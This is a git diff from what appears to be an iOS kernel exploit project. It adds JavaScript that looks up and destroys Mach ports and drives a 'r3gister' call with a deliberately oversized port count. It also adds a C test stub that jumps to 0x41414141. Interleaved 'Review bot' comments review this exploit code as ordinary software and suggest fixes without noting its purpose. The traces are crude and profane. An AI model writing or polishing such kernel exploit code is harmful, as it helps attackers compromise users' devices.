| -rwxr-xr-x | src/js/kexp/exploit.js | 28 | ||||
| -rwxr-xr-x | tools/testlol.c | 12 |
2 files changed, 39 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 7ec7cc3..55ac673 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -368,6 +368,32 @@ function mach_ports_lookup_shit() {
 // return 0x42603;
 }
 
+function mach_ports_lookup_shit_dealloc() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("mpl success\n");
+
+ for (var i = 0; i < read_u32(sz); i++) {
+ if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
+ mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
+ }
+ }
+
+ return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
+}
+
 var kernel_task_addr = 0;
 function get_kernel_task() {
 var ret = 0;
@@ -458,7 +484,7 @@ again: while (true) {
 var arrmpt = shit_heap(8);
 write_u32(arrmpt, 0);
 write_u32(arrmpt + 4, 0);
- mach_ports_lookup_shit();
+ mach_ports_lookup_shit_dealloc();
 var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 mach_ports_lookup_shit();
 printf("%d %s\n", ret__, mach_error_string(ret__));
diff --git a/tools/testlol.c b/tools/testlol.c
index d39bf47..fa0c1d9 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -107,6 +107,14 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma
 return ret;
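Review bot: `mach_ports_lookup_shit_dealloc` returns `read_u32(read_u32(arrz) + 8)` after the loop directly above has already passed that same entry to `mach_port_destroy`, so the caller receives a port name whose right was just released; read the value into a local before the loop, or document that a stale name is the intended result. The status of `calls4arg("mach_ports_lookup", ...)` is discarded, so on failure the following reads dereference whatever `arrz` still holds (zero, from the `write_u32(arrz, 0)` above) — check it before touching the array. The lookup uses `task_self` while the destroy loop uses `mach_task_self()`; presumably these name the same task, but the two spellings should agree. `var sz = shit_heap(4);;` carries a stray semicolon and the six `printf("fuck\n")` traces read as leftover debugging; if they stay, a one-line comment saying what the function is meant to release would help, since despite its name no call in the function deallocates the returned array memory. The second hunk swaps only the first of the two `mach_ports_lookup_shit()` calls for the new variant — a comment stating whether that asymmetry is intended would save the next reader a guess.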
}
+void (*ptr)() = (void (*)())0x41414141;
+
+static kern_return_t r3gister(task_t task, mach_port_array_t init_port_set, mach_msg_type_number_t real_count, mach_msg_type_number_t fake_count)
+{
+ ptr();
+ printf("%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p\n");
+}
+
struct test {
int a;
int b;
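Review bot: `r3gister` is declared `kern_return_t` but falls off the end without a `return`, and the `printf` inside it supplies forty-two `%p` conversions with no matching arguments — both are undefined behavior and `-Wall -Wformat -Wreturn-type` reports them. If the stub is a deliberate crash probe (the call through `ptr`, initialised to `0x41414141`, presumably faults on entry so the `printf` is never reached), say so in a comment above it, e.g. `/* test stub: faults on the indirect call; the printf is not expected to run */`, and add `return KERN_SUCCESS;` or change the return type to `void` so the declared contract is honest. The parameters `task`, `init_port_set`, `real_count` and `fake_count` are never read; `(void)task;` and friends, or unnamed parameters, would silence `-Wunused-parameter` while keeping the signature that mirrors the JS `r3gister`. `send_ports`, whose closing `return ret;` and `}` form the hunk's leading context, starts outside the hunk.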
@@ -242,6 +250,10 @@ int main(int argc, char* argv[]) {
 mach_port_t *arrz=0;
printf("%p %p\n", arrz, &arrz);
+ mach_port_t arr[2] = {MACH_PORT_NULL,MACH_PORT_NULL};
+ r3gister(0x41414141,arr,0x42424242,3);
+ printf("r3gister done\n");
+
#pragma pack(4)
typedef struct {
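Review bot: The count passed in `r3gister(0x41414141,arr,0x42424242,3);` does not match the two-element `arr` declared on the line above, so any implementation of `r3gister` that walks `real_count` entries of `init_port_set` reads past `arr`; with the current stub nothing reads it, but the mismatch deserves either `r3gister(0x41414141, arr, 2, 3);` or a comment stating that the oversized count is deliberate test input. The same applies to `0x41414141` passed where a `task_t` is expected — a named constant with a one-line comment would make the intent readable instead of a bare magic number. Because the stub calls through `ptr` before anything else, the `printf("r3gister done\n")` that follows is presumably never reached; `main` starts outside the hunk.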
